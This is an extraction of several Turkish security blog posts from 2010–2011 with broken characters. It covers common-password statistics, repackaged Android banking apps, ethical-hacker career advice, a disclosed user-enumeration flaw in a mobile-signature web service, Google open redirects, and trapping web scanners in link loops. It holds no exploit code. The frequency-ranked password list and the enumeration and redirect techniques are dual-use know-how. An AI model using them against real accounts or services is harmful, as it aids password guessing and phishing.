24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 24: Hack 4 Career - 2011

24

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin birincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Nasıl Ahlaklı Korsan Olunur Source httpswwwmertsaricacomnasil-ahlakli-korsan-olunurBy MS on May 19th 2011

Bu soruyu kendime ilk sorduğumda 15-16 yaşlarındaydım Google arama motorunun var olduğu ama bilinmediği o yıllarda Altavistaarama motoru ile bu soruya yanıt aramak ve cevabını iccedileren sayısız kaynağa ulaşmak pek muumlmkuumln olmuyordu bu nedenle benim deyolum o zamanlar kullanımı oldukccedila popuumller olan IRC sunucularından geccedilti EFnet IRC Ağında yer alan Hackers kanalında sabahakşam konuşmaları takip ederek az da olsa birşeyler oumlğrenmeye ccedilalışıyordum Guumlnuumln birinde sohbet ettiğim bir kişi (keşke rumuzunuhatırlayıp teşekkuumlr edebilsem) samimi bir şekilde programlama konusunda bilgi sahibi olmam gerektiğini ve işletim sistemi olaraksadece Windows ile yetinmeyerek Linux işletim sistemi de kullanmam gerektiğini soumlylemişti Programlama kısmını anlıyordum ancakkara kuru bir ekranda ccedilalışmanın bana ne gibi bir getirisi olacağı konusunda şuumlphelerim vardı Aradan 15 sene geccediltikten ve ahlaklı korsan(ethical hacker penetration tester) olduktan sonra ne zaman program yazsam kendi kendime adam haklıymış der ne zaman Backtrackile ccedilalışmam gerekse al sana kara kuru ekran der dururum )

Ne mutlu bana ki duumlnyanın 4 bir yanından oumlzellikle genccedil arkadaşlardan ccedilok sayıda e-postalar alıyor ve her birini oumlzenle yanıtlıyorumCcediloğunun yanıtını aradığı tek bir soru var nasıl ahlaklı korsan olurum nereden ve nasıl başlamalıyım

Oumlncelikle yazımı ahlaksız korsanların okuması ihtimaline karşı neden ahlaklı olunması gerektiği konusunu kısaca bir kaccedil madde ileaccedilıklayayım

bull Yasalar ile başınız derde girmez

bull Bu işi kariyere doumlnuumlştuumlrerek uzun vadede para kazanabilirsiniz

bull İnsanların guumlvenini sevgisini ve saygısını kazanabilirsiniz

bull İşvereninizin desteğini arkanıza alarak pahalı eğitimlere konferanslara bedava katılma şansı yakalayabilirsiniz )

Gelelim ahlaklı korsan olmak iccedilin yapmanız gerekenlere

bull İngilizce oumlğrenin Herşeyden oumlnce İngilizce bilmeniz gerekir en azından okuduğunuzu anlayacak kadar diyelim Nedeni basitguumlvenlik sektoumlruumlnde gerccedilekleştirilen ccedilalışmalardan kaynaklara kadar ccediloğu materyalin dili İngilizce bu nedenle guumlndemigelişmeleri yakından takip edebilmek iccedilin ne yapın ne edin oumlncelikle İngilizce oumlğrenmeye bakın olmazsa olmaz

bull Programlama dili oumlğrenin Hackerın İngilizce soumlzluumlk anlamına bakacak olursanız programcı kelimesinin geccediltiğini goumlrebilirsinizKorsan olupta programlama bilmemek gibi bir şansınız yok yok diyenlerede itibar etmeyin İstismar aracı hazırlamayı bir kenarakoydum en azından kısa zamanda ccedilok iş başarabilmek ve bunu otomatiğe bağlayabilmek iccedilin kendi programınızı yazmanız gerekenzamanlar mutlaka olacaktır Teknik olarak ileri seviyeye ilerledikccedile (misal tersine muumlhendislik yaparken) programlamanın şartolduğunu goumlrebilirsiniz Guumlvenlik zafiyeti keşfedebilmek iccedilin C programlama dilini oumlğrenmeniz gerekecektir Bu dil sayesindediğer programlama dillerini okuduğunuzda rahatlıkla anlayabildiğinizi goumlreceksiniz bu sayede kaynak kodu analizi sizin iccedilin dahakolay olacaktır Testler esnasında işinizi kolaylaştıracak dillerden bir tanesini muhakkak oumlğrenmelisiniz Bunun iccedilin Pythonutercih ettim mutluyum huzurluyum Kapalı kaynak kodlu yazılımlarda guumlvenlik zafiyeti keşfetmekten istismar kodu kabuk koduoluşturmaya kadar bir ccedilok aşamada Assembly programlama dilini biliyor olmanız yararınıza olacaktır Metasploit ve diğer araccedillarile hepsini hallederim demeyin başlangıccedil seviyesinden oumlteye gidemez program bağımlı yaşarsınız

bull Bol bol okuyun ve pratik yapın Ağ sistem veritabanı web uygulaması konularında temel kitaplar okuyun ve bilgi seviyeniziarttırın Temel seviyede bilgi sahibi olduktan sonra tuumlm bu alanlar ve daha fazlası ile ilgili hacking kitapları okumaya başlayınBunun iccedilin Amazoncom sitesine giderek hacking anahtar kelimesi ile sorgular yapın ve en ccedilok okunan beğenilen kitapları sıraylaokumaya başlayın Başlangıccedil seviyesi iccedilin Hacking Exposed serilerini oumlnerebilirim Okuduğunuzu pratik etmezseniz unutmanızve ihtiyaccedil duymanız durumunda tekrar okumanız gerekebileceği iccedilin kendinize windows ve linux işletim sistemleri kurulu ikisanal makina oluşturun ve tuumlm denemelerinizi oumlğrendiklerinizi bu sistemler uumlzerinde gerccedilekleştirerek pratiğe doumlkuumln

bull Sertifika alın ve eğitimlere gidin Kim ne derse desin sertifikalar işe girmenizi kolaylaştırmaktadır Sertifikayı kartvizit olarakduumlşuumlnebilirsiniz Karşı tarafın (işveren iletişim kurduğunuz kişiler vs) spesifik olarak belli bir alanda sertifikalandırabilecekduumlzeyde temel bilgi seviyesine sahip olduğunuzu anlamasına yardımcı olacaktır Tehditler riskler ve suumlrekli değişen saldırıyoumlntemlerini goumlz oumlnuumlnde bulundurduğunuzda kendinizi suumlrekli guumlncel tutmanız gerekiyor ve katılacağınız eğitimler kitaplarakıyasla kısa zamanda bu bilgiyi almanızı sağlamaktadırlar (Maddi olanakları ccedilok fazla dert etmeyin ccediluumlnkuuml kurumsal bir firmadaccedilalışıyorsanız eğitime bedava gidebileceksiniz)

bull Sabırlı ve duyarlı olun Bir guumlvenlik zafiyeti keşfettiğiniz zaman (karşı sisteme saldırarak değil) oumlrnek olarak kullandığınız birhizmet tasarımsal olarak guumlvenli değil veya kullandığınız programda guumlvenlik zafiyeti keşfettiniz yapacağınız ilk iş zafiyetin doğrugeccedilerli olduğunu teyit etmek olmalıdır Emin olduktan sonra responsible disclosure modelini izleyerek sistemin yetkilisi veyaprogramın dağıtıcısı ile goumlruumlşerek durumu izah etmeye ccedilalışın Empati yaparak kendinizi karşı tarafın yerine koyun ve amacınızınguumlvenlik zafiyetini ortadan kaldırmak olduğunu ve bu hizmeti veya programı kullanan kişilerin art niyetli kişiler tarafından istismaredilmesini engellemek olduğunu ve bu nedenle karşı taraf ile iletişime geccediltiğinizi aklınızdan ccedilıkartmayarak karşı taraf ile şartlarne olursa olsun işbirliği yapmaya ccedilalışın Responsible disclosure modelinde zafiyet ortadan kalktıktan sonra zafiyet ile ilgili

25

detaylı bilgiye ilgili platformlarda yer verebilirsiniz eğer firma guumlvenlik buumllteninde adının geccedilmesini istemiyorsa saygı duyun vesansuumlrleyerek yayınlayın ccediluumlnkuuml amacımız firmayı ve hizmetlerini koumltuumllemek değil insanların guumlvenliğini sağlamak

bull Bilişim hukukundan anlayan bir avukat tutun Responsible disclosure modelinde karşı taraf ile iletişim kurmaya ccedilalışırsınız ancakiletişim kuramadığınız durumlarda daha doğrusu karşı taraftan herhangi bir yanıt alamadığınız durumlarda bu guumlvenlik zafiyetiniilgili platformlarda accedilıklayarak bu sistemi veya hizmeti kullanan insanları bu konuda bilgilendirir ve yetkilileri goumlreve ccedilağırırsınızAncak kimi zaman işler istediğiniz şekilde ilerlemeyebilir ve karşı taraf e-posta atmışsın ama telefon accedilmamışsın diyebilir ben 20yıldır guumlvenlik sektoumlruumlndeyim vay efendim sen benim kim olduğumu biliyor musun diyebilir guumlvenlik zafiyetini namus meselesiyaparak sen benim namusuma nasıl el uzatırsın diyebilir sizin onlarla onların iyiliği ve muumlşterilerinin guumlvenliği iccedilin iletişimkurmaya ccedilalıştığınızı unutarak itibarımı zedeledin diyebilir oumlzetle karşı taraf sizin iyi niyetinizi suistimal ederek sonunda hukukiyollara başvurabilir ve kendinizi yasalar oumlnuumlnde savunmanız gerekebilir (Buguumlne kadar yerli yabancı buumlyuumlk kuumlccediluumlk 50ye yakınfirma ile responsible disclosure adımından geccedilmiş biri olarak bu ihtimalin ccedilok duumlşuumlk olduğunu ve sadece bu tuumlr bir tavırla 1 defakarşılaştığımı genellikle kurumsal şirketlerde bu tuumlr bir yaklaşımın olmadığını aksine size teşekkuumlr edildiğini belirtmek isterim)Bu nedenle iyi bir avukat tutmanız her zaman yerinde bir adım olacaktır

Uzun lafın kısası ahlaklı korsan olmak iccedilin yapmanız gerekenler İngilizce bilmek ağ sistem veritabanı web uygulamaları konularındatemel bilgi sahibi olmak programlama bilmek eğitimlere katılmak sertifikalar almak ve bol bol hacking ile ilgili kitaplar okumak vepratik yapmak olacaktır

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin ikincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Web Servis Guumlvenliğine DairSource httpswwwmertsaricacomweb-servis-kullanimina-dairBy MS on March 23rd 2011

Ağırlıklı olarak xml tabanlı olan web servisler genelde iki farklı uygulamanın birbiri ile ortak bir dil uumlzerinden haberleşmesi amacıylakullanılmaktadır Bu sayede farklı programlama dilleri ile yazılmış iki uygulama birbirleri ile haberleşirken bir web servis kullanarakhaberleşme esnasında ortaya ccedilıkabilecek yazılımsaltasarımsal uyumsuzlukları veya engelleri ortadan kaldırmaktadır

Ccediloğunlukla son kullanıcı bir web uygulaması ile etkileşimde bulunurken arka planda bu uygulama kullanıcıya sunacağı iccedileriği farklısunuculardan web servis aracılığı ile toplamakta ve harmanladıktan sonra kullanıcıya sunmaktadır

Web servis denilince ccediloğu kişinin aklına XML ve SOAP gelmektedir SOAP XML kullanarak uygulamalar arası bilgi alışverişinin nasılsağlayacağını tanımlayan bir standart bir protokolduumlr XML ise veri goumlstermek amacıyla kullanılan HTMLin aksine veri taşımak vesaklamak iccedilin kullanılan bir dildir

Web servislerine youmlnelik tehditlerin başında XML enjeksiyonu XPath enjeksiyonu XML bombası paramatre manipuumllasyonu WSDLtaraması ve daha bir ccedilok tehdit gelmektedir

Web Services Description Language (WSDL) bir web servis ile iletişim kurulabilmesi iccedilin gerekli parametreleri metodları iccedilerirWSDLi dış duumlnyaya accedilık olan bir web servis uumlzerinde yer alan servis yukarda bahsi geccedilen tehditlere mağruz kalabildiği gibi servisinve hizmetin koumltuumlye kullanımını da yol accedilabilmektedir

Oumlrnek olarak X firmasının sitesinde yer alan bir gsm firmasına ait olan imzalama yazılımına kısaca goumlz atalım

Bu imzalama programı mobil imza kullanıcılarının kişisel bilgisayarlarındaki dosyaları cep telefonları aracılığıyla elektronik olarakimzalamalarını ve kendilerine gelen elektronik imzalanmış dosyaları doğrulamalarını sağlayabilen kurulumu ve kullanımı oldukccedila basitolan bir yazılımdır

Mobil İmza kullanma gayesiyle goumlz attığım bu yazılımın doğrudan bir web servis ile haberleşiyor olması ister istemez dikkatimi ccedilekmişticcediluumlnkuuml kurumsal ağlarda ve guumlvenli tasarlanan yazılımlarda son kullanıcının web servis ile muumlnasebet kurması ccedilok tercih edilmemektedir

26

WSDL dosyasına baktığımda KullanıcıVarMi ImzaIleLisansAl VarOlanLisansiGetir servisleri ilgimi ccedilekti Normal şartlarda imzalamauygulaması kullanılarak ccedilağrılabilecek bu servisler WSDLden elde edilen bilgiler ile istenildiği taktirde herhangi bir http isteği yapanbir araccedil uumlzerinden de ccedilağrılabilir Kısaca imzalama uygulaması yerine isteyen kendi uygulamasını hazırlayarak bu servisleri ccedilağırabilirve uygulama uumlzerinde yer alan kısıtlamalardan etkilenmeyebilir

Aklıma gelen ilk soru art niyetli bir kişi başkasına ait olan bir lisansı VarOlanLisansiGetir servisini ccedilağırarak getirebilir miydi Busorunun yanıtını her ne kadar merak etsem de etik accedilıdan doğru olmayacağını duumlşuumlnduumlğuumlm iccedilin aramaktan vazgeccediltim Bunun yerineKullanıcıVarMi servisi ile bir kaccedil sorgu gerccedilekleştirdim Bu servisin bir gsm şirketine ait olan herhangi bir telefon numarası ile ccedilağrılmasıdurumunda sunucudan true (var) ya da false (yok) şeklinde yanıt geldiğini goumlrduumlm Servisin ccedilalışıp ccedilalışmadığını teyit etmek iccedilin elimdemobil imza kullanan ve kullanmayan iki farklı cep telefonu numarası ile deneme gerccedilekleştirdim ve servisin ccedilalıştığını teyit ettim

27

Servisin bu şekilde isteyen herkes tarafından kullanılabiliyor olmasının art niyetli kişiler tarafından nasıl istismar edilebileceğiniduumlşuumlnmeye koyulduğumda aklıma gelen ilk senaryo şu şekilde oldu Bildiğiniz gibi man in the mobile saldırısı gerccedilekleştiren Zeusbankacılık trojanı kullanıcının cep telefonuna SMS şifresini ccedilalmak iccedilin bir trojan goumlndermektedir Boumlyle bir servisin halka accedilık olarakhizmet vermesi durumunda bu servisten faydalanan zararlı bir yazılım koumlruuml koumlruumlne kurbana ait olan cep telefonu numarasına SMSşifresini ccedilalan trojan goumlndermek yerine oumlncelikle bu servisi ccedilağırarak mobil imza kullanıcısı olup olmadığını teyit edebilir ve yanıtagoumlre mobil imza uygulamasını hedef alan zararlı bir yazılım goumlnderebilir Bu servisin bu şekli ile kullanılmasının bir gsm firmasınaait mobil imza kullanan banka muumlşterilerinin ve bankaların doğru bulmayacağını duumlşuumlnerek konuyu hemen X firmasına bildirmekiccedilin sayfalarında yer alan e-posta adresine bir e-posta goumlnderdim Bu adrese goumlnderilen e-postaları kontrol etmeyeceklerini duumlşuumlnerek(Tuumlrkiye gerccedileği) biraz araştırma yaparak genel muumlduumlruumln e-posta adresini bularak kendisine konu ile ilgili iletişim kurabileceğim biryetkilinin bilgisini oumlğrenmek iccedilin ayrı bir e-posta goumlnderdim Ancak iki hafta iccedilinde tarafıma herhangi bir geri doumlnuumlş yapılmadığı iccedilinbu servisin art niyetli kişiler tarafından bu şekilde kullanılmasını en kısa suumlrede engelleyebilmek adına bu yazıyı yazma ve ilgililerigoumlreve ccedilağırma misyonunu uumlstlendim

Yazının giriş kısmında da belirttiğim uumlzere web servislerin sadece uygulamalar arasında kullanılıyor olması ve son kullanıcı kullanımınakısıtlanıyor olması bu tuumlr tehditleri berteraf edilmesine yardımcı olacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle

[28-03-2011] Guumlncelleme Firma genel muumlduumlruumlnuumln buguumln itibariyle tarafımla iletişime geccedilmesi ve firma isimlerinin yazıda geccedilmesindenoumltuumlruuml duyduğu rahatsızlığı dile getirmesi uumlzerine yazıda geccedilen firma isimleri sansuumlrlenmiştir Gerekli goumlruumllmesi durumunda ilerleyenzamanlarda kendileri ile gerccedilekleştirilen yazışmalara yer verilebilir

Googlersquoa Bile GuumlvenmeSource httpswwwmertsaricacomgooglea-bile-guvenmeBy MS on March 7th 2011

Milliyetcomtr web sitesinde yer alan bir haberde dolandırıcıların Gelir İdaresi Başkanlığına (wwwgibgovtr) ait olan internetvergi dairesi sitesinin bir kopyasını oluşturdukları ve benzer bir alan adı altında (wwwgibgentr) site kurarak insanları dolandırmaya

28

ccedilalıştıkları ortaya ccedilıkmış İşin ilginccedil yanı ise bu sahte sitenin Google arama motorunda motorlu taşıtlar vergisi anahtar kelimesi ileyapılan aramalarda ilk sırada ccedilıkabilmesi iccedilin dolandırıcılar tarafından Googlea reklam verilmiş olması

Aslında yıllardan beri Google arama motoru uumlzerinde zararlı kod yayan sitelerden dolandırıcılık amacıyla kurulmuş olan sitelere kadarbir ccedilok zararlı sitenin kullanıcıları benzer youmlntemler ile hedef aldığı bilinmektedir Googleda bunlar karşısında boş durmayarak zararlıkod yayan siteleri tespit etmekte ve arama sonuccedillarına ilgili site iccedilin ufak bir ibare ekleyerek ziyaret edilmek istenen sitenin pek teguumlvenilir olmadığı konusunda kullancıları bilgilendirmektedir

Zararlı ve sahte sitelerin ister istemez Google arama sonuccedillarında yer alabilmesi kullanıcılar iccedilin tehlike oluştururken bence koumltuumlyekullanılabilecek bir diğer tehlike ise Google arama motorunda yer alan kendimi şanslı hissediyorum arama oumlzelliğidir Herhangi biranahtar kelime yazıp (web adresi de olabilir) bu butona basacak olursanız anahtar kelimeniz ile ilişkili olan ilk web sitesine youmlnlendiğinizi(URL Redirection) goumlrebilirsiniz

Her ne kadar Google ip adreslerine youmlnlendirme yapmıyor olsa da anahtar kelime olarak yazının başında bahsetmiş olduğumdolandırıcılar tarafından kurulan web sitesinin adresini yazmanız durumunda bu adrese sizi seve seve youmlnlendirecektir

Google Uumlzerinden Youmlnlendirme Oumlrneği (Kendimi Şanslı Hissediyorum) Kendini şanslı hissediyor musun

Kendimi şanslı hissediyorum youmlnlendirmesine ilave olarak Google arama motoru uumlzerinde başka bir youmlnlendirme daha mevcut OumlrneğinFirefox internet tarayıcısı uumlzerinde adres ccedilubuğuna root yazıp enter tuşuna basacak olursanız kendinizi httprootcernchdrupalsitesinde bulduğunuzu goumlrebilirsiniz Yine arka tarafta bunun nasıl ccedilalıştığına bakacak olursak adres ccedilubuğuna yazacağınız bir kelimearka tarafta Google arama motoruna giderek sizi bu anahtar kelime ile ilişkili olan site başlığına (title) sahip ilk siteye youmlnlendirmektedir

Google Uumlzerinden Youmlnlendirme Oumlrneği Googlea bile guumlvenme

Sonuccedil olarak bu tuumlr kontrolsuumlz URL youmlnlendirmelerinin phishing saldırılarından istismar paketlerine (exploit pack) youmlnlendirmeye kadarkoumltuumlye kullanıldığına bir ccedilok defa tanık olmuştum ancak Google arama motorunun bu tuumlr saldırılara imkan tanıyacak bir tasarıma sahipolduğu buguumlne dek hiccedil dikkatimi ccedilekmemişti Siz siz olun gelen bağlantı adresi googlecomgooglecomtr iccedileriyor diye koumlruuml koumlruumlnetıklamayın

Bir sonraki yazı ile goumlruumlşmek dileğiyle

Script Kiddie Bezdirme MekanizmasıSource httpswwwmertsaricacomscript-kiddie-bezdirme-mekanizmasiBy MS on February 27th 2011

Guumlnuumlmuumlzde internete accedilık web sitelerinin kaderinde ya Ccedilin uumlzerinden ya da Rusya uumlzerinden en az bir defa taranmak vardır Bunu webuygulamaları uumlzerindeki zafiyetleri otomatik olarak tespit etmek ve istismar etmek uumlzere hazırlanmış bir solucan (worm) yaptığı gibiproxy arkasına gizlenmiş meraklı bir script kiddie de yapıyor olabilir

Benim sitem de zaman zaman meraklı arkadaşların ilgi alanına girmekte ve Netsparkerdan Acunetixe kadar bir ccedilok ticari webuygulaması guumlvenlik tarayıcıları (web application security scanner) ile taranmaktadır Her ne kadar bu zamana dek bu durumdamşikayetccedili olmasamda kendimi şikayet edenlerine yerine koyarak acaba bu script kiddielerin işlerini mod_security ve benzer karmaşıkyoumlntemlere başvurmadan nasıl zorlaştırabilirim sorusuna yanıt aramaya koyuldum

Script kiddienin ticari araccedillar ile tarama işlemini simuumlle etmek iccedilin ilk olarak Windows işletim sistemi yuumlkluuml olan sanal makine iccedilinebir web sunucusu kurmam gerekiyordu ve seccedilimimi WAMPtan yana kullandım Daha sonra demo suumlruumlmuuml ile bu web sunucusunutarayabilecek meşhur ticari bir tarama aracı aramaya başladım Eskiden web uygulaması guumlvenlik tarayıcısı denilince akla ya HPfirmasının satın aldığı Spi Dynamics firmasının Webinspect uumlruumlnuuml ya da IBM firmasının satın aldığı Watchfire firmasının Appscan uumlruumlnuumlgelirdi Her ne kadar HP satın alana dek Webinspectin hayranı olsam da bu senaryoda IBMin Appscan demo uumlruumlnuumlnuuml kullanmayakarar verdim

Başka bir sanal makineye Appscan uumlruumlnuumlnuuml kurduktan sonra diğer sanal makinemde kurulu olan web sunucusunu tarayabilmek iccedilinufak bir numara ile httpdemotestfirenet sitesini taranacak sanal makinemin ip adresine youmlnlendirdim ve zorlaştırma youmlntemi uumlzerineduumlşuumlnmeye başladım (Webinspect ve Appscan araccedillarının demo suumlruumlmleri ile sadece kendi demo sitelerini (Appscan iccedilin httpdemotestfirenet web adresi Webinspect iccedilin httpzerowebappsecuritycom web adresi) tarayabilmektesiniz)

Penetrasyon testlerinde karşılaşmak istemeyeceğiniz durumlardan biri uzun suumlren taramanın tamamlanmasına yakın tarama aracınıngoumlccedilmesi bir diğeri ise taranan sitenin ccedilok buumlyuumlk olması ve isteklere geccedil yanıt veriyor olması nedeniyle taramanın saatlerce suumlrmesidirKorsanlar ve script kiddieler genellikle sabırsız insanlardır bu nedenle hedefe bir an oumlnce sızmak iccedilin en kestirme en hızlı yoluseccedilmektedirler Bunu goumlz oumlnuumlnde bulundurarak tarama aracının 10 dakikada tarayabileceği bir siteyi ufak bir numara ile saatler iccedilindetaramasını sağlayabilmenin script kiddieyi bezdirebileceği duumlşuumlncesiyle Appscani biraz etuumlt etmeye başladım

Appscan ccedilalışma prensibi gereği hedef web sitesini taramaya başlamadan oumlnce site uumlzerinde keşfe ccedilıkmakta ve sitenin haritasınıccedilıkarmaktadır Keşif aşaması tamamlandıktan hemen sonra tarama işlemine geccedilmekte ve bu aşamada yeni bir bağlantı adresi (link) ilekarşılaşması durumunda bu adresi otomatik olarak taranacaklar listesine dahil etmektedir Durum boumlyle olunca acaba bir web sayfasıhazırlasam ve bu sayfa her ziyaret edildiğinde rastgele bağlantı adresi uumlretiyor olsa bu sayfayı ziyaret eden Appscan yeni bağlantı adresi-gt tara -gt yeni bağlantı adresi -gt tara şeklinde sonsuz bir doumlnguumlye girer mi sorusuna yanıt aramaya başladım

29

Bunun iccedilin oumlncelikle httpdconf uumlzerinde oumlzel bir hata sayfası oluşturdum (missingphp) ki bulamadığı her sayfa iccedilin otomatik olarakmissingphp sayfasına youmlnlendirilsin ve bu sayfada uumlretilen rastgele 100 bağlantı adresi sayesinde sonsuz doumlnguumlye girebildin Bir kaccedildeneme sonucunda Appscani doumlnguumlye (sonsuz olabilir) sokan sayfayı oluşturdum ve muradıma erdim

httpdconf uumlzerinde oumlzel hata sayfası belirtme

Oluşturduğum web sayfaları

30

Normal şartlarda 2 dakikada taranabilen bir sayfa 46 dakika sonunda halen taranmaya ve ziyaret edilecek URL (resimde sol alt koumlşeyedikkat) sayısı artmaya devam ediyor (doumlnguuml)

31

Benzer sorun diğer ticari web uygulaması guumlvenlik tarayıcılarında var mı diyerek Netsparker ve Acunetix araccedillarına baktığımda bununAppscane oumlzguuml bir sorun olduğu ve bunun yanında başka bir sorun daha dikkatimi ccedilekti Misal ekran goumlruumlntuumllerinde yer alan JSklasoumlruumlnuumln aslında geccedilerli var olan bir klasoumlr olmamasına rağmen Appscan ve Acunetix araccedilları Netsparkerın aksine site haritalarınavar olmayan klasoumlrleri ekleyerek goumlruumlntuuml kirliliği yaratmakta ve site haritasının kullanımını zorlaştırmaktalar

Sonuccedil olarak sitenizin bu tuumlr otomatik araccedillar ile taranmasından rahatsız oluyorsanız bu araccedilları inceleyerek zayıf noktalarını keşfedebilirve site keşfini zorlaştıracak basit numaralara ile script kiddieleri canlarından bezdirebilirsiniz )

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi haftasonları dilerim

Not Uumlretilen bağlantı adreslerine benim yaptığım gibi isim (link text) vermez iseniz kullanıcıların yanlışlıkla bu bağlantı adreslerinetıklamasını engelleyebilirsiniz

Devletrsquoin Sitesi DenizhellipSource httpswwwmertsaricacomdevletin-sitesi-denizBy MS on February 20th 2011

